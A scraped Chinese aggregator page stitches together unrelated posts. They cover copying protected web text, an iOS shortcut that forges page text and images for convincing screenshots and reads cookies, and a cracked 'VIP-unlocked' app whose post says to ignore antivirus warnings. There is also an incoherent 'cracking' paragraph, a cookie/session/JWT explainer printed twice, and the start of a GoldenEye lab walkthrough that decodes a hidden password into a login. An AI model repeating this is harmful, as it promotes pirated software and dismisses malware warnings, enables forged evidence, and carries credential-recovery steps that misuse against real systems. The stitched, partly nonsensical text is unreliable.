　　
　　2、查看源文件
　　在需要复制的页面右击，点击【查看源文件】，然后复制源文件中的文字内容，再粘贴到你的Word文档中即可完成。
　　
　　3、迅捷PDF转换器
　　我们还可以将需要复制的文字截图保存下来，然后用使用第三方工具将多张图片中的文字OCR识别出来，适用于工作量非常大的情况。
　　
　　有了这些方法，以后再也不怕遇到网页上的内容无法复制的情况了！
　　 查看全部

　　【ios黑科技】解锁网页限制，篡改浏览器上的文字与图片，复制任意网页内容
　　每天下午4点，果粉软件部落为大家精选各种实用影视软件、音乐软件、小说软件等供大家下载。
　　当然还有每日限免软件和付费软件共享（付费软件目前没发现值得买的，后续有看到了再给大家分享。如果你们有中意的，可以发给我，合适的话也可以帮买后给共享给大家下载）
　　近期开始增加ios破解软件专区，满足果粉们的软件需求。
　　【网页辅助工具（快捷指令】
　　今天分享的是一个很有意思的快捷指令，它的功能很好理解，就是安装了该捷径之后，可以修改网页上的文字及图片，而且很难辨别真假。
　　除了能修改网页内容之外，还能调节视频播放倍速、查看页面源码、保存全局内容、获取网页图片……
　　
　　
　　使用方法也很简单，打开某个网页后，点击底部的分享按钮并找到“网页辅助工具端”，点击后即可使用。
　　
　　比如说，我想修改网页内容，就可以选择“编辑页面内容”的功能。
　　启用该功能之后，我们点击页面的任意文字内容，即可在网页上实时修改，比用审查元素更高效。
　　
　　修改过后，网页几乎看不到一丁点瑕疵，这样截出来的图就跟真的一样！
　　所以，我们不论看网上的爆料信息、还是别人发来的图片，都别百分百信任它，尤其牵扯到利益更是得慎之又慎。
　　
　　另外平时浏览网页时，遇到很多张好看的照片，一张张打开保存的话，很麻烦。
　　有了这个捷径之后，只需点击“获取网页图片”，即可保存该网页的全部图片啦！
　　另外“读取网页内容”指令，还可以随意复制网页里的内容了，没任何限制！
　　视频倍速播放、获取视频地址、获取页面 Cookie 等功能也是相当NICE。可以说是相当实用了。
　　免责声明：果粉软件部落分享的资源均来源于互联网公开分享的内容，仅用于个人学习使用，禁止用于其他商业用途和倒卖。账号、软件如有使用问题，请联系我处理。
　　▌获取方式
　　先点击右下角的“在看” 查看全部

　　破解网站禁止复制页面内容和图片：破解复制网站内容
　　破解网站禁止复制页面内容和图片：1.先复制想要复制的网站链接,然后发现下面有链接进去后如下图点击进去会看到下面这样的一个框框:site:域名正确的一步是上传到图片,我们点击上传按钮.点击上传以后会出现以下提示,然后移除（移除）当然这个...随便你了,提示框里面填不填随你咯，总之是要在空白页面上上传喽...然后点击上传上传以后就会马上出现到选择网站下载链接下面左下角有下载的，直接移动就行了,速度还是可以的.点击上传按钮一瞬间马上跳转到一个页面，里面是下载好的图片.然后点击右边的黄色提示，右边是根据小图文的简介来下载的当然，最简单的方法是用电脑,手机一般是没有联网空间可以下载的，没有联网空间，下载速度比较慢。
　　哈哈哈但是最简单方法永远是自己动手试一试才知道啊，其实我觉得不如出去租个单间，家里有人的话就比较方便，我们公司在东莞这边就出租过两个单间，卫生间有wifi，用wifi的话就可以挂着蜂窝数据，随时随地都可以在家玩游戏，看小说，看网页。搞的电脑被黑一样，每天都要换台电脑，来来回回就是换这个电脑用，其实也没有多少钱，租单间一天就十几块，多的话二十多一天，看自己想去哪个房间，就去哪个房间，基本的电费一个月就上千了，够我们支出一个月电费的钱了。(二维码自动识别)加入吧。 查看全部

　　网页文字不能复制粘贴怎么办？教你3个破解妙招，轻松搞定难题
　　工作和生活中，经常需要在网页上查找、浏览一些资料，但是查找的资料，想要借鉴却没有办法下载下来。
　　多数时候，遇到这样的情况只能失落的关闭网页。其实可以教你3个破解妙招，轻松解决网页文字不能复制粘贴的问题。
　　
　　1、 截图文字提取
　　查看网页内容的时候，如果电脑上登录了QQ，可以按住"Ctrl+alt+A"进行页面的截图；
　　
　　可以看到页面上显示的截图区域，可以调整截图区域大小，不过最多不能超过整个屏幕，点击功能项中的"文"，就可以将截图里的文字内容提取出来；
　　
　　提取出来的文字，可以点击"复制"，直接复制到文本文档里保存。不过这种方法，只能保存当前页面的文字内容，需要反复操作，而且复制的文字显得很乱。
　　
　　2、 查看源文件
　　这种方法用的人比较少，可以通过鼠标，右击页面选择"查看源文件"，自动弹出一个TXT文档，这里显示的都是当前页面的代码和文字；
　　
　　接下来我们可以按下"Ctrl+F"，然后输入需要复制内容的首个字、首段话，就可以找到并复制使用了；
　　
　　这样确实可以复制更多内容，但是方法操作的步骤比较多，比较浪费时间。
　　
　　3、 图片文字识别
　　这个和QQ的方法比较相似，不过更加丰富，可以做到批量识别、长图识别，打开一个不能随意复制文字的网页，然后截图下来；
　　
　　然后在任意浏览器上打开迅捷PDF转换器，找到"图片文字识别"的功能，点击一下选择"图片文字识别"，就可以将刚才保存的文件导入到网站内；
　　
　　最后点击"开始识别"的选项，就能将文字提取出来，并自动保存为电子档。这种方法比较通用，批量识别、单个识别都比较简单。
　　
　　到这里，关于网页上禁止复制、粘贴的文字破解方法就介绍完了。可能你还有其他的方法，不妨也分享给大家哦。 查看全部

　　青柠海报设计破解版，已解锁特权，登陆即是VIP，永久免费建议收藏
　　下载须知：
　　1. 公众号所分享的软件都是已亲自测试，可放心使用，仅供学习交流，勿用于商业用途；如果觉得不错，欢迎将公众号推荐给您的朋友使用。
　　2.破解软件的签名和原官方软件不一致，会出现报毒！无需理会！放心使用。另破解软件有时效性，如出现无法使用请关注后续版本的更新。
　　3.获取链接后请复制到浏览器下载。如还是无法下载，请关闭纯净模式。
　　
　　近期会将原工作黑科技公众号上的资源全部搬运至此公众号上，不过原来文章的图片都丢失了，只保留了文字部分。200多篇文章为了快速搬运，无法再补上图片了。青柠海报设计（安卓）
　　▌软件介绍
　　青柠海报设计app是一款专业的海报设计类软件，软件功能很多，不仅仅可以为用户提供海报设计服务，还有编辑和修图等多种功能，可以满足用户的多方面的使用需求！
　　
　　·极简操作：通过简单点击选择即可轻松创作自己的H5，一分钟制作出超酷的H5项目
　　·行业动态：首页展示优秀案例，更有标签精准筛选出行业翘楚的H5项目
　　·优质图片：近万张2265优质图片任君挑选，没有素材，一样能够制作精美的H5
　　·海量模板：包含17个行业，13个应用场景的行业模板，上百个页面通用版式，方便用户快速进行制作
　　软件功能
　　1、水印添加，设置需要增加的水印内容就能改变图片的外观，增加图片辨识度
　　2、智能抠图，智能抠图可以快速的提取想要的图片内容，不用自己慢慢的修图
　　3、海量模板，各种精美的海报模板以及简历logo都能进行使用，升级办公效率
　　4、全能编辑，全能化的编辑以及多方位的模板和素材，为编辑人士带来了便利
　　免责声明：0点黑科技公众号所分享的资源全部是来源于互联网公开分享的内容，仅用于个人学习使用，禁止用于其他商业用途和倒卖。如有条件请支持正版，谢谢。如软件失效、打不开等问题，请联系我处理，谢谢。
　　▌获取方式
　　先点击右下角的“在看” 查看全部

　　破解网站禁止复制页面内容和图片 Cookie、Session、Token与JWT解析
　　链接：
　　认证、授权与凭证什么是认证（Authentication）？什么是授权（Authorization）？什么是凭证（Credentials）Cookie与Session什么是Cookie？
　　cookie 重要的属性
　　
　　什么是 Session
　　
　　session 认证流程（如上图）：
　　根据以上流程可知，SessionID 是连接 Cookie 和 Session 的一道桥梁，大部分系统也是根据此原理来验证用户登录状态。
　　基于Session的认证机制由Servlet规范定制，Servlet容器已经实现，用户通过HttpSession的操作方法可以实现：
　　
　　Cookie 和 Session 的区别拓展：Session痛点
　　看起来通过 cookie + session 的方式是解决了问题， 但是我们忽略了一个问题，上述情况能正常工作是因为我们假设 server 是单机工作的，但实际在生产上，为了保障高可用，一般服务器至少需要两台机器，通过负载均衡的方式来决定到底请求该打到哪台机器上。
　　
　　假设登录请求打到了 A 机器，A 机器生成了 session 并在 cookie 里添加 sessionId 返回给了浏览器，那么问题来了：下次添加购物车时如果请求打到了 B 或者 C，由于 session 是在 A 机器生成的，此时的 B,C 是找不到 session 的，那么就会发生无法添加购物车的错误，就得重新登录了，此时请问该怎么办。主要有以下三种方式：
　　（1 ）session 复制
　　A 生成 session 后复制到 B, C，这样每台机器都有一份 session，无论添加购物车的请求打到哪台机器，由于 session 都能找到，故不会有问题
　　
　　这种方式虽然可行，但缺点也很明显：
　　（2）session 粘连
　　这种方式是让每个客户端请求只打到固定的一台机器上，比如浏览器登录请求打到 A 机器后，后续所有的添加购物车请求也都打到 A 机器上，Nginx 的 sticky 模块可以支持这种方式，支持按 ip 或 cookie 粘连等等，如按 ip 粘连方式如下
　　
　　这样的话每个 client 请求到达 Nginx 后，只要它的 ip 不变，根据 ip hash 算出来的值会打到固定的机器上，也就不存在 session 找不到的问题了，当然不难看出这种方式缺点也是很明显，对应的机器挂了怎么办？
　　（3）session 共享
　　这种方式也是目前各大公司普遍采用的方案，将 session 保存在 redis，memcached 等中间件中，请求到来时，各个机器去这些中间件取一下 session 即可。
　　
　　缺点其实也不难发现，就是每个请求都要去 redis 取一下 session，多了一次内部连接，消耗了一点性能，另外为了保证 redis 的高可用，必须做集群，当然了对于大公司来说, redis 集群基本都会部署，所以这方案可以说是大公司的首选了。
　　Token（令牌）与 JWT（跨域认证）Token概述（no session!）
　　通过上文分析我们知道通过在服务端共享 session 的方式可以完成用户的身份定位，但是不难发现也有一个小小的瑕疵：搞个校验机制我还得搭个 redis 集群？大厂确实 redis 用得比较普遍，但对于小厂来说可能它的业务量还未达到用 redis 的程度，所以有没有其他不用 server 存储 session 的用户身份校验机制呢，使用token！
　　简单来说：首先请求方输入自己的用户名，密码，然后 server 据此生成 token，客户端拿到 token 后会保存到本地（token存储在浏览器端），之后向 server 请求时在请求头带上此 token 即可（server有校验机制，检验token合法性，同时server通过token中携带的uid确定是谁在访问它）。
　　
　　可以看到 token 主要由三部分组成：
　　当 server 收到浏览器传过来的 token 时，它会首先取出 token 中的 header + payload，根据密钥生成签名，然后再与 token 中的签名比对，如果成功则说明签名是合法的，即 token 是合法的。而且你会发现 payload 中存有我们的 userId，所以拿到 token 后直接在 payload 中就可获取 userid，避免了像 session 那样要从 redis 去取的开销。
　　你会发现这种方式确实很妙，只要 server 保证密钥不泄露，那么生成的 token 就是安全的，因为如果伪造 token 的话在签名验证环节是无法通过的，就此即可判定 token 非法。
　　可以看到通过这种方式有效地避免了 token 必须保存在 server 的弊端，实现了分布式存储，不过需要注意的是，token 一旦由 server 生成，它就是有效的，直到过期，无法让 token 失效，除非在 server 为 token 设立一个黑名单，在校验 token 前先过一遍此黑名单，如果在黑名单里则此 token 失效，但一旦这样做的话，那就意味着黑名单就必须保存在 server，这又回到了 session 的模式，那直接用 session 不香吗。所以一般的做法是当客户端登出要让 token 失效时，直接在本地移除 token 即可，下次登录重新生成 token 就好。
　　另外需要注意的是 token 一般是放在 header 的 Authorization 自定义头里，不是放在 Cookie 里的，这主要是为了解决跨域不能共享 Cookie 的问题
　　总结：token解决什么问题（为什么要用token）？
　　拓展1：那啥是CSRF呢？
　　攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过（cookie 里带来 sessionId 等身份认证的信息），所以被访问的网站会认为是真正的用户操作而去运行。
　　那么如果正常的用户误点了上面这张图片，由于相同域名的请求会自动带上 cookie，而 cookie 里带有正常登录用户的 sessionid，类似上面这样的转账操作在 server 就会成功，会造成极大的安全风险
　　
　　CSRF 攻击的根本原因在于对于同样域名的每个请求来说，它的 cookie 都会被自动带上，这个是浏览器的机制决定的！
　　至于完成一次CSRF攻击必要的两个步骤：
　　1、首先登了一个正常的网站A，并且在本地生成了cookie
　　2、在cookie有效时间内，访问了危险网站B（就获取了身份信息）
　　Q：那我不访问危险网站就完了呗？
　　A：危险网站也许只是个存在漏洞的可信任网站！
　　Q：那我访问完正常网站，关了浏览器就好了呀？
　　A：即使关闭浏览器，cookie也不保证一定立即失效，而且关闭浏览器并不能结束会话，session的生命周期跟这些都没关系。
　　拓展2：同源策略？
　　拓展3：什么是跨域，如何解决？
　　拓展4：易于扩展？
　　拓展5：无状态？
　　拓展6：什么是单点登录？
　　Acesss Token
　　特点：
　　
　　token 的身份验证流程：
　　客户端使用用户名跟密码请求登录
　　服务端收到请求，去验证用户名与密码
　　验证成功后，服务端会签发一个 token 并把这个 token 发送给客户端
　　客户端收到 token 以后，会把它存储起来，比如放在 cookie 里或者 localStorage 里
　　客户端每次向服务端请求资源的时候需要带着服务端签发的 token
　　服务端收到请求，然后去验证客户端请求里面带着的 token ，如果验证成功，就向客户端返回请求的数据
　　注意点：
　　Refresh Token
　　
　　两者区别：
　　Token 的缺点
　　那有人就问了，既然 token 这么好，那为什么各个大公司几乎都采用共享 session 的方式呢，可能很多人是第一次听到 token，token 不香吗? token 有以下两点劣势：
　　所以 token 更适合一次性的命令认证，设置一个比较短的有效期！！！
　　拓展：不管是 cookie 还是 token，从存储角度来看其实都不安全（实际上防护 CSRF 攻击的正确方式是用 CSRF token），都有暴露的风险，我们所说的安全更多的是强调传输中的安全，可以用 HTTPS 协议来传输， 这样的话请求头都能被加密，也就保证了传输中的安全。
　　其实我们把 cookie 和 token 比较本身就不合理，一个是存储方式，一个是验证方式，正确的比较应该是 session vs token。
　　Token 和 Session 的区别
　　token和session其实都是为了身份验证，session一般翻译为会话，而token更多的时候是翻译为令牌；session和token都是有过期时间一说，都需要去管理过期时间；
　　JWT概述生成 JWTJWT 的原理
　　
　　JWT 认证流程：
　　Authorization: Bearer <br />
　　JWT 的使用方式方式一
　　GET /calendar/v1/events<br />
　　方式二方式三
　　http://www.example.com/user?token=xxx<br />
　　项目中使用 JWT
　　项目地址：
　　Token 和 JWT 的区别
　　相同：
　　区别：
　　常见的前后端鉴权方式
　　Session-Cookie
　　Token 验证（包括 JWT，SSO）
　　OAuth2.0（开放授权）
　　常见的加密算法不可逆加密：【Hash加密算法/散列算法/摘要算法】
　　MD5：Message Digest Algorithm MD5（中文名为消息摘要算法第五版）为计算机安全领域广泛使用的一种散列函数，用以提供消息的完整性保护。该算法的文件号为RFC 1321（R.Rivest,MIT Laboratory for Computer Science and RSA Data Security Inc. April 1992）。MD5即Message-Digest Algorithm 5（信息-摘要算法5），用于确保信息传输完整一致。是计算机广泛使用的杂凑算法之一（又译摘要算法、哈希算法），主流编程语言普遍已有MD5实现。将数据（如汉字）运算为另一固定长度值，是杂凑算法的基础原理，MD5的前身有MD2、MD3和MD4。
　　MD5算法具有以下特点：1、压缩性：任意长度的数据，算出的MD5值长度都是固定的。2、容易计算：从原数据计算出MD5值很容易。3、抗修改性：对原数据进行任何改动，哪怕只修改1个字节，所得到的MD5值都有很大区别。4、强抗碰撞：已知原数据和其MD5值，想找到一个具有相同MD5值的数据（即伪造数据）是非常困难的。MD5的作用是让大容量信息在用数字签名软件签署私人密钥前被"压缩"成一种保密的格式（就是把一个任意长度的字节串变换成一定长的十六进制数字串）。除了MD5以外，其中比较有名的还有sha-1、RIPEMD以及Haval等。
　　SHA1 ：安全哈希算法（Secure Hash Algorithm）主要适用于数字签名标准 （Digital Signature Standard DSS）里面定义的数字签名算法（Digital Signature Algorithm DSA）。对于长度小于2^64位的消息，SHA1会产生一个160位的消息摘要。当接收到消息的时候，这个消息摘要可以用来验证数据的完整性。在传输的过程中，数据很可能会发生变化，那么这时候就会产生不同的消息摘要。SHA1有如下特点：1.不可以从消息摘要中复原信息；2.两个不同的消息不会产生同样的消息摘要,(但会有1x10 ^ 48分之一的机率出现相同的消息摘要,一般使用时忽略)。
　　可逆加密：可逆加密有对称加密和非对称加密。对称加密：【文件加密和解密使用相同的密钥，即加密密钥也可以用作解密密钥】非对称加密：【两个密钥：公开密钥（publickey）和私有密钥，公有密钥加密，私有密钥解密】常见问题使用 cookie 时需要考虑的问题使用 session 时需要考虑的问题使用 token 时需要考虑的问题使用 JWT 时需要考虑的问题使用加密算法时需要考虑的问题分布式架构下 session 共享方案1. session 复制
　　优点： 可容错，各个服务器间 session 能够实时响应。
　　缺点： 会对网络负荷造成一定压力，如果 session 量大的话可能会造成网络堵塞，拖慢服务器性能。
　　2. 粘性 session /IP 绑定策略
　　优点： 简单，不需要对 session 做任何处理。
　　缺点： 缺乏容错性，如果当前访问的服务器发生故障，用户被转移到第二个服务器上时，他的 session 信息都将失效。
　　适用场景： 发生故障对客户产生的影响较小；服务器发生故障是低概率事件 。
　　实现方式： 以 Nginx 为例，在 upstream 模块配置 ip_hash 属性即可实现粘性 session。
　　3. session 共享（常用）
　　
　　4. session 持久化
　　优点： 服务器出现问题，session 不会丢失
　　缺点： 如果网站的访问量很大，把 session 存储到数据库中，会对数据库造成很大压力，还需要增加额外的开销维护数据库。
　　只要关闭浏览器 ，session 真的就消失了？
　　不对。对 session 来说，除非程序通知服务器删除一个 session，否则服务器会一直保留，程序一般都是在用户做 log off 的时候发个指令去删除 session。
　　然而浏览器从来不会主动在关闭之前通知服务器它将要关闭，因此服务器根本不会有机会知道浏览器已经关闭，之所以会有这种错觉，是大部分 session 机制都使用会话 cookie 来保存 session id，而关闭浏览器后这个 session id 就消失了，再次连接服务器时也就无法找到原来的 session。
　　如果服务器设置的 cookie 被保存在硬盘上，或者使用某种手段改写浏览器发出的 HTTP 请求头，把原来的 session id 发送给服务器，则再次打开浏览器仍然能够打开原来的 session。
　　恰恰是由于关闭浏览器不会导致 session 被删除，迫使服务器为 session 设置了一个失效时间，当距离客户端上一次使用 session 的时间超过这个失效时间时，服务器就认为客户端已经停止了活动，才会把 session 删除以节省存储空间。
　　项目地址
　　巨人的肩膀： 查看全部

　　破解网站禁止复制页面内容和图片 Cookie、Session、Token与JWT解析
　　链接：
　　认证、授权与凭证什么是认证（Authentication）？什么是授权（Authorization）？什么是凭证（Credentials）Cookie与Session什么是Cookie？
　　cookie 重要的属性
　　
　　什么是 Session
　　
　　session 认证流程（如上图）：
　　根据以上流程可知，SessionID 是连接 Cookie 和 Session 的一道桥梁，大部分系统也是根据此原理来验证用户登录状态。
　　基于Session的认证机制由Servlet规范定制，Servlet容器已经实现，用户通过HttpSession的操作方法可以实现：
　　
　　Cookie 和 Session 的区别拓展：Session痛点
　　看起来通过 cookie + session 的方式是解决了问题， 但是我们忽略了一个问题，上述情况能正常工作是因为我们假设 server 是单机工作的，但实际在生产上，为了保障高可用，一般服务器至少需要两台机器，通过负载均衡的方式来决定到底请求该打到哪台机器上。
　　
　　假设登录请求打到了 A 机器，A 机器生成了 session 并在 cookie 里添加 sessionId 返回给了浏览器，那么问题来了：下次添加购物车时如果请求打到了 B 或者 C，由于 session 是在 A 机器生成的，此时的 B,C 是找不到 session 的，那么就会发生无法添加购物车的错误，就得重新登录了，此时请问该怎么办。主要有以下三种方式：
　　（1 ）session 复制
　　A 生成 session 后复制到 B, C，这样每台机器都有一份 session，无论添加购物车的请求打到哪台机器，由于 session 都能找到，故不会有问题
　　
　　这种方式虽然可行，但缺点也很明显：
　　（2）session 粘连
　　这种方式是让每个客户端请求只打到固定的一台机器上，比如浏览器登录请求打到 A 机器后，后续所有的添加购物车请求也都打到 A 机器上，Nginx 的 sticky 模块可以支持这种方式，支持按 ip 或 cookie 粘连等等，如按 ip 粘连方式如下
　　
　　这样的话每个 client 请求到达 Nginx 后，只要它的 ip 不变，根据 ip hash 算出来的值会打到固定的机器上，也就不存在 session 找不到的问题了，当然不难看出这种方式缺点也是很明显，对应的机器挂了怎么办？
　　（3）session 共享
　　这种方式也是目前各大公司普遍采用的方案，将 session 保存在 redis，memcached 等中间件中，请求到来时，各个机器去这些中间件取一下 session 即可。
　　
　　缺点其实也不难发现，就是每个请求都要去 redis 取一下 session，多了一次内部连接，消耗了一点性能，另外为了保证 redis 的高可用，必须做集群，当然了对于大公司来说, redis 集群基本都会部署，所以这方案可以说是大公司的首选了。
　　Token（令牌）与 JWT（跨域认证）Token概述（no session!）
　　通过上文分析我们知道通过在服务端共享 session 的方式可以完成用户的身份定位，但是不难发现也有一个小小的瑕疵：搞个校验机制我还得搭个 redis 集群？大厂确实 redis 用得比较普遍，但对于小厂来说可能它的业务量还未达到用 redis 的程度，所以有没有其他不用 server 存储 session 的用户身份校验机制呢，使用token！
　　简单来说：首先请求方输入自己的用户名，密码，然后 server 据此生成 token，客户端拿到 token 后会保存到本地（token存储在浏览器端），之后向 server 请求时在请求头带上此 token 即可（server有校验机制，检验token合法性，同时server通过token中携带的uid确定是谁在访问它）。
　　
　　可以看到 token 主要由三部分组成：
　　当 server 收到浏览器传过来的 token 时，它会首先取出 token 中的 header + payload，根据密钥生成签名，然后再与 token 中的签名比对，如果成功则说明签名是合法的，即 token 是合法的。而且你会发现 payload 中存有我们的 userId，所以拿到 token 后直接在 payload 中就可获取 userid，避免了像 session 那样要从 redis 去取的开销。
　　你会发现这种方式确实很妙，只要 server 保证密钥不泄露，那么生成的 token 就是安全的，因为如果伪造 token 的话在签名验证环节是无法通过的，就此即可判定 token 非法。
　　可以看到通过这种方式有效地避免了 token 必须保存在 server 的弊端，实现了分布式存储，不过需要注意的是，token 一旦由 server 生成，它就是有效的，直到过期，无法让 token 失效，除非在 server 为 token 设立一个黑名单，在校验 token 前先过一遍此黑名单，如果在黑名单里则此 token 失效，但一旦这样做的话，那就意味着黑名单就必须保存在 server，这又回到了 session 的模式，那直接用 session 不香吗。所以一般的做法是当客户端登出要让 token 失效时，直接在本地移除 token 即可，下次登录重新生成 token 就好。
　　另外需要注意的是 token 一般是放在 header 的 Authorization 自定义头里，不是放在 Cookie 里的，这主要是为了解决跨域不能共享 Cookie 的问题
　　总结：token解决什么问题（为什么要用token）？
　　拓展1：那啥是CSRF呢？
　　攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过（cookie 里带来 sessionId 等身份认证的信息），所以被访问的网站会认为是真正的用户操作而去运行。
　　那么如果正常的用户误点了上面这张图片，由于相同域名的请求会自动带上 cookie，而 cookie 里带有正常登录用户的 sessionid，类似上面这样的转账操作在 server 就会成功，会造成极大的安全风险
　　
　　CSRF 攻击的根本原因在于对于同样域名的每个请求来说，它的 cookie 都会被自动带上，这个是浏览器的机制决定的！
　　至于完成一次CSRF攻击必要的两个步骤：
　　1、首先登了一个正常的网站A，并且在本地生成了cookie
　　2、在cookie有效时间内，访问了危险网站B（就获取了身份信息）
　　Q：那我不访问危险网站就完了呗？
　　A：危险网站也许只是个存在漏洞的可信任网站！
　　Q：那我访问完正常网站，关了浏览器就好了呀？
　　A：即使关闭浏览器，cookie也不保证一定立即失效，而且关闭浏览器并不能结束会话，session的生命周期跟这些都没关系。
　　拓展2：同源策略？
　　拓展3：什么是跨域，如何解决？
　　拓展4：易于扩展？
　　拓展5：无状态？
　　拓展6：什么是单点登录？
　　Acesss Token
　　特点：
　　
　　token 的身份验证流程：
　　客户端使用用户名跟密码请求登录
　　服务端收到请求，去验证用户名与密码
　　验证成功后，服务端会签发一个 token 并把这个 token 发送给客户端
　　客户端收到 token 以后，会把它存储起来，比如放在 cookie 里或者 localStorage 里
　　客户端每次向服务端请求资源的时候需要带着服务端签发的 token
　　服务端收到请求，然后去验证客户端请求里面带着的 token ，如果验证成功，就向客户端返回请求的数据
　　注意点：
　　Refresh Token
　　
　　两者区别：
　　Token 的缺点
　　那有人就问了，既然 token 这么好，那为什么各个大公司几乎都采用共享 session 的方式呢，可能很多人是第一次听到 token，token 不香吗? token 有以下两点劣势：
　　所以 token 更适合一次性的命令认证，设置一个比较短的有效期！！！
　　拓展：不管是 cookie 还是 token，从存储角度来看其实都不安全（实际上防护 CSRF 攻击的正确方式是用 CSRF token），都有暴露的风险，我们所说的安全更多的是强调传输中的安全，可以用 HTTPS 协议来传输， 这样的话请求头都能被加密，也就保证了传输中的安全。
　　其实我们把 cookie 和 token 比较本身就不合理，一个是存储方式，一个是验证方式，正确的比较应该是 session vs token。
　　Token 和 Session 的区别
　　token和session其实都是为了身份验证，session一般翻译为会话，而token更多的时候是翻译为令牌；session和token都是有过期时间一说，都需要去管理过期时间；
　　JWT概述生成 JWTJWT 的原理
　　
　　JWT 认证流程：
　　Authorization: Bearer <br />
　　JWT 的使用方式方式一
　　GET /calendar/v1/events<br />
　　方式二方式三
　　http://www.example.com/user?token=xxx<br />
　　项目中使用 JWT
　　项目地址：
　　Token 和 JWT 的区别
　　相同：
　　区别：
　　常见的前后端鉴权方式
　　Session-Cookie
　　Token 验证（包括 JWT，SSO）
　　OAuth2.0（开放授权）
　　常见的加密算法不可逆加密：【Hash加密算法/散列算法/摘要算法】
　　MD5：Message Digest Algorithm MD5（中文名为消息摘要算法第五版）为计算机安全领域广泛使用的一种散列函数，用以提供消息的完整性保护。该算法的文件号为RFC 1321（R.Rivest,MIT Laboratory for Computer Science and RSA Data Security Inc. April 1992）。MD5即Message-Digest Algorithm 5（信息-摘要算法5），用于确保信息传输完整一致。是计算机广泛使用的杂凑算法之一（又译摘要算法、哈希算法），主流编程语言普遍已有MD5实现。将数据（如汉字）运算为另一固定长度值，是杂凑算法的基础原理，MD5的前身有MD2、MD3和MD4。
　　MD5算法具有以下特点：1、压缩性：任意长度的数据，算出的MD5值长度都是固定的。2、容易计算：从原数据计算出MD5值很容易。3、抗修改性：对原数据进行任何改动，哪怕只修改1个字节，所得到的MD5值都有很大区别。4、强抗碰撞：已知原数据和其MD5值，想找到一个具有相同MD5值的数据（即伪造数据）是非常困难的。MD5的作用是让大容量信息在用数字签名软件签署私人密钥前被"压缩"成一种保密的格式（就是把一个任意长度的字节串变换成一定长的十六进制数字串）。除了MD5以外，其中比较有名的还有sha-1、RIPEMD以及Haval等。
　　SHA1 ：安全哈希算法（Secure Hash Algorithm）主要适用于数字签名标准 （Digital Signature Standard DSS）里面定义的数字签名算法（Digital Signature Algorithm DSA）。对于长度小于2^64位的消息，SHA1会产生一个160位的消息摘要。当接收到消息的时候，这个消息摘要可以用来验证数据的完整性。在传输的过程中，数据很可能会发生变化，那么这时候就会产生不同的消息摘要。SHA1有如下特点：1.不可以从消息摘要中复原信息；2.两个不同的消息不会产生同样的消息摘要,(但会有1x10 ^ 48分之一的机率出现相同的消息摘要,一般使用时忽略)。
　　可逆加密：可逆加密有对称加密和非对称加密。对称加密：【文件加密和解密使用相同的密钥，即加密密钥也可以用作解密密钥】非对称加密：【两个密钥：公开密钥（publickey）和私有密钥，公有密钥加密，私有密钥解密】常见问题使用 cookie 时需要考虑的问题使用 session 时需要考虑的问题使用 token 时需要考虑的问题使用 JWT 时需要考虑的问题使用加密算法时需要考虑的问题分布式架构下 session 共享方案1. session 复制
　　优点： 可容错，各个服务器间 session 能够实时响应。
　　缺点： 会对网络负荷造成一定压力，如果 session 量大的话可能会造成网络堵塞，拖慢服务器性能。
　　2. 粘性 session /IP 绑定策略
　　优点： 简单，不需要对 session 做任何处理。
　　缺点： 缺乏容错性，如果当前访问的服务器发生故障，用户被转移到第二个服务器上时，他的 session 信息都将失效。
　　适用场景： 发生故障对客户产生的影响较小；服务器发生故障是低概率事件 。
　　实现方式： 以 Nginx 为例，在 upstream 模块配置 ip_hash 属性即可实现粘性 session。
　　3. session 共享（常用）
　　
　　4. session 持久化
　　优点： 服务器出现问题，session 不会丢失
　　缺点： 如果网站的访问量很大，把 session 存储到数据库中，会对数据库造成很大压力，还需要增加额外的开销维护数据库。
　　只要关闭浏览器 ，session 真的就消失了？
　　不对。对 session 来说，除非程序通知服务器删除一个 session，否则服务器会一直保留，程序一般都是在用户做 log off 的时候发个指令去删除 session。
　　然而浏览器从来不会主动在关闭之前通知服务器它将要关闭，因此服务器根本不会有机会知道浏览器已经关闭，之所以会有这种错觉，是大部分 session 机制都使用会话 cookie 来保存 session id，而关闭浏览器后这个 session id 就消失了，再次连接服务器时也就无法找到原来的 session。
　　如果服务器设置的 cookie 被保存在硬盘上，或者使用某种手段改写浏览器发出的 HTTP 请求头，把原来的 session id 发送给服务器，则再次打开浏览器仍然能够打开原来的 session。
　　恰恰是由于关闭浏览器不会导致 session 被删除，迫使服务器为 session 设置了一个失效时间，当距离客户端上一次使用 session 的时间超过这个失效时间时，服务器就认为客户端已经停止了活动，才会把 session 删除以节省存储空间。
　　项目地址
　　巨人的肩膀： 查看全部

　　红队渗透项目之黄金眼（GoldenEye）
　　
　　3、挖掘JS信息
　　‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍在页面查看源代码：
　　‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍<br />访问：view-source:http://192.168.4.202/terminal.js<br />
　　
　　通过对话可知信息中存在两个人名，以及告知了密码信息。
　　获得用户名：Boris、Natalya
　　获得密码，可以看出是HTML加密：‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍
　　&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;<br />
　　4、HTML解密
　　解密的方法千万种，该项目是第一个后面会有很多个项目给大家演示，先带大家熟悉神器Burpsuiter解密HTML：kali自带Burpsuiter工具
　　
　　在Burpsuiter打开后在Decoder处进行HTML破解获取：InvincibleHack3r
　　最终账号密码：
　　boris/InvincibleHack3r<br />
　　5、信息页面枚举
